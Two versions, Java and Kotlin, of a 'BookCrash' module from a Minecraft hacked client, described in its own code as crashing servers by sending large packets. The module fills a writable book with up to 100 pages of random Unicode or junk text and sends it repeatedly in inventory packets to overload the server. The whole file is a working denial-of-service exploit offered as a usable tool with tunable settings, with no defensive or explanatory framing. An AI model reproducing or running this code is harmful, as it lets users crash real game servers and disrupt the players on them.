File: src/main/java/me/zeroeightsix/kami/module/modules/misc/BookCrash.java
package me.zeroeightsix.kami.module.modules.misc;

import me.zeroeightsix.kami.command.Command;
import me.zeroeightsix.kami.module.Module;
import me.zeroeightsix.kami.setting.Setting;
import me.zeroeightsix.kami.setting.Settings;
import net.minecraft.client.Minecraft;
import net.minecraft.init.Items;
import net.minecraft.inventory.ClickType;
import net.minecraft.item.ItemStack;
import net.minecraft.nbt.NBTTagCompound;
import net.minecraft.nbt.NBTTagList;
import net.minecraft.nbt.NBTTagString;
import net.minecraft.network.play.client.CPacketClickWindow;
import net.minecraft.network.play.client.CPacketCreativeInventoryAction;

import java.util.Random;
import java.util.stream.Collectors;
import java.util.stream.IntStream;

/**
 * Created by d1gress/Qther on 25/11/2019.
 * Updated by d1gress/Qther on 26/11/2019.
 */
@Module.Info(name = "BookCrash", category = Module.Category.MISC, description = "Crashes servers by sending large packets")
public class BookCrash extends Module {

    private int currDelay;
    private Setting<Mode> mode = register(Settings.e("Mode", Mode.RAION));
    private Setting<FillMode> fillMode = register(Settings.e("Fill Mode", FillMode.RANDOM));
    private Setting<Integer> uses = register(Settings.i("Uses", 5));
    private Setting<Integer> delay = register(Settings.i("Delay", 0));
    private Setting<Integer> pagesSettings = register(Settings.i("Pages", 50));
    private Setting<Boolean> autoToggle = register(Settings.b("AutoToggle", true));

    @Override
    public void onUpdate() {
        if (Minecraft.getMinecraft().getCurrentServerData() == null || Minecraft.getMinecraft().getCurrentServerData().serverIP.isEmpty()) {
            Command.sendChatMessage("Not connected to a server");
            this.disable();
        }

        currDelay = (currDelay >= delay.getValue() ? 0 : delay.getValue() + 1);
        if (currDelay > 0) return;

        ItemStack bookObj = new ItemStack(Items.WRITABLE_BOOK);
        NBTTagList list = new NBTTagList();
        NBTTagCompound tag = new NBTTagCompound();
        String author = "Bella";
        String title = "\n Bella Nuzzles You \n";

        String size = "";
        int pages = Math.min(pagesSettings.getValue(), 100);
        int pageChars = 210;

        if (fillMode.getValue().equals(FillMode.RANDOM)) {
            IntStream chars = new Random().ints(0x80, 0x10FFFF - 0x800).map(i -> i < 0xd800 ? i : i + 0x800);
            size = chars.limit(pageChars * pages).mapToObj(i -> String.valueOf((char) i)).collect(Collectors.joining());
        } else if (fillMode.getValue().equals(FillMode.FFFF)) {
            size = repeat(pages * pageChars, String.valueOf(0x10FFFF));
        } else if (fillMode.getValue().equals(FillMode.ASCII)) {
            IntStream chars = new Random().ints(0x20, 0x7E);
            size = chars.limit(pageChars * pages).mapToObj(i -> String.valueOf((char) i)).collect(Collectors.joining());
        } else if (fillMode.getValue().equals(FillMode.OLD)) {
            size = "wveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5vr2c43rc434v432tvt4tvybn4n6n57u6u57m6m6678mi68,867,79o,o97o,978iun7yb65453v4tyv34t4t3c2cc423rc334tcvtvt43tv45tvt5t5v43tv5345tv43tv5355vt5t3tv5t533v5t45tv43vt4355t54fwveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5vr2c43rc434v432tvt4tvybn4n6n57u6u57m6m6678mi68,867,79o,o97o,978iun7yb65453v4tyv34t4t3c2cc423rc334tcvtvt43tv45tvt5t5v43tv5345tv43tv5355vt5t3tv5t533v5t45tv43vt4355t54fwveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5";
        }

        for (int i = 0; i < pages; i++) {
            String siteContent = size;
            NBTTagString tString = new NBTTagString(siteContent);
            list.appendTag(tString);
        }

        tag.setString("author", author);
        tag.setString("title", title);
        tag.setTag("pages", list);

        bookObj.setTagInfo("pages", list);
        bookObj.setTagCompound(tag);

        for (int i = 0; i < uses.getValue(); i++) {
            mc.playerController.connection.sendPacket(new CPacketClickWindow(0, 0, 0, ClickType.PICKUP, bookObj, (short) 0));
            if (mode.getValue() == Mode.JESSICA) {
                mc.playerController.connection.sendPacket(new CPacketCreativeInventoryAction(0, bookObj));
            }
        }
    }

    private enum Mode {
        JESSICA, RAION
    }

    private enum FillMode {
        ASCII, FFFF, RANDOM, OLD
    }

    private static String repeat(int count, String with) {
        return new String(new char[count]).replace("\0", with);
    }

}

File: src/main/java/me/zeroeightsix/kami/module/modules/misc/BookCrash.kt
package me.zeroeightsix.kami.module.modules.misc

import me.zeroeightsix.kami.event.events.SafeTickEvent
import me.zeroeightsix.kami.module.Module
import me.zeroeightsix.kami.setting.Settings
import me.zeroeightsix.kami.util.TimerUtils
import me.zeroeightsix.kami.util.event.listener
import me.zeroeightsix.kami.util.text.MessageSendHelper.sendChatMessage
import net.minecraft.init.Items
import net.minecraft.inventory.ClickType
import net.minecraft.item.ItemStack
import net.minecraft.nbt.NBTTagCompound
import net.minecraft.nbt.NBTTagList
import net.minecraft.nbt.NBTTagString
import net.minecraft.network.play.client.CPacketClickWindow
import net.minecraft.network.play.client.CPacketCreativeInventoryAction
import java.util.*
import java.util.stream.Collectors
import java.util.stream.IntStream

@Module.Info(
        name = "BookCrash",
        category = Module.Category.MISC,
        description = "Crashes servers by sending large packets"
)
object BookCrash : Module() {
    private val mode = register(Settings.e<Mode>("Mode", Mode.RAION))
    private val fillMode = register(Settings.e<FillMode>("FillMode", FillMode.RANDOM))
    private val uses = register(Settings.integerBuilder("Uses").withValue(2).withRange(1, 10))
    private val delay = register(Settings.integerBuilder("Delay").withValue(0).withRange(0, 40))
    private val pages = register(Settings.integerBuilder("Pages").withValue(50).withRange(1, 100))

    private enum class Mode {
        JESSICA, RAION
    }

    private enum class FillMode {
        ASCII, REPEAT, RANDOM
    }

    private val timer = TimerUtils.TickTimer(TimerUtils.TimeUnit.TICKS)

    init {
        listener<SafeTickEvent> {
            if (mc.currentServerData == null || mc.currentServerData?.serverIP.isNullOrBlank() || mc.connection == null) {
                sendChatMessage("Not connected to a server")
                disable()
                return@listener
            }

            if (!timer.tick(delay.value.toLong())) return@listener

            val list = NBTTagList()
            val text: String

            text = when (fillMode.value as FillMode) {
                FillMode.RANDOM -> {
                    val chars = Random().ints(0x80, 0x10FFFF - 0x800).map { if (it < 0xd800) it else it + 0x800 }
                    chars.collectToPages()
                }
                FillMode.REPEAT -> {
                    repeat(pages.value * 210, 0x10FFFF.toString())
                }
                FillMode.ASCII -> {
                    val chars = Random().ints(0x20, 0x7E)
                    chars.collectToPages()
                }
            }

            for (i in 0 until pages.value) {
                list.appendTag(NBTTagString(text))
            }

            val tag = NBTTagCompound().apply {
                setString("author", "KAMI Blue")
                setString("title", "\n Minecraft pozzed \n")
                setTag("pages", list)
            }
            val bookObj = ItemStack(Items.WRITABLE_BOOK).apply {
                setTagInfo("pages", list)
                tagCompound = tag
            }

            for (i in 0 until uses.value) {
                mc.connection!!.sendPacket(CPacketClickWindow(0, 0, 0, ClickType.PICKUP, bookObj, 0.toShort()))
                if (mode.value == Mode.JESSICA) {
                    mc.connection!!.sendPacket(CPacketCreativeInventoryAction(0, bookObj))
                }
            }
        }
    }

    private fun IntStream.collectToPages() =
        this.limit(210 * pages.value.toLong()).mapToObj<String> { it.toChar().toString() }.collect(Collectors.joining())

    private fun repeat(count: Int, with: String): String {
        return String(CharArray(count)).replace("\u0000", with)
    }
}
